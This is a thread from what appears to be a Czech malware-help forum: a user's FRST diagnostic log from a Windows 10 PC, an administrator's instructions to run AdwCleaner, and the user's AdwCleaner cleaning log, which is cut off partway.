ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 005511927 _____ () [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\7zip\SevenZipJBinding-0EsPGE1ZKaCb\lib7-Zip-JBinding.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 000246784 ____N (Java(TM) Native Access (JNA)) [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\jna\jna2000625691529400810.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============

Windows Defender:
===================================
Date: 2021-01-19 15:14:30.5250000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {A810C501-209B-476E-BE78-8D034DF2EACB}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-18 15:14:59.6230000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {C7EDB0A6-0DC9-49BC-98B0-085C324C837E}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-17 15:11:40.7990000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {48B4917E-4551-413D-B6AC-1881372BAB72}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-16 15:44:59.5540000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {D139E753-CCAA-4ECD-95BD-EF51D794489F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-15 15:11:40.7830000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {BA570A37-FEAE-4F83-AB21-171251D96BE4}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 91%
Total physical RAM: 3767.05 MB
Available physical RAM: 330.68 MB
Total Virtual: 8631.05 MB
Available Virtual: 3342.64 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:60.55 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:229.64 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Rudy
Site Admin
Posts: 118371
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: Please check my log

#2 Post by Rudy »

Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking Souhlasím (I agree)
right-click the AdwCleaner icon and choose Spustit jako správce (Run as administrator); on Win XP just start it with a normal double-click
click Skenovat nyní (Scan now), then Čištění a opravy (Clean and Repair)
after the restart a log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply

Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!

Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.

chenny
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#3 Post by chenny »

Here is the log.

# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 9
# Failed: 1


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted BS Player Customized Web Search
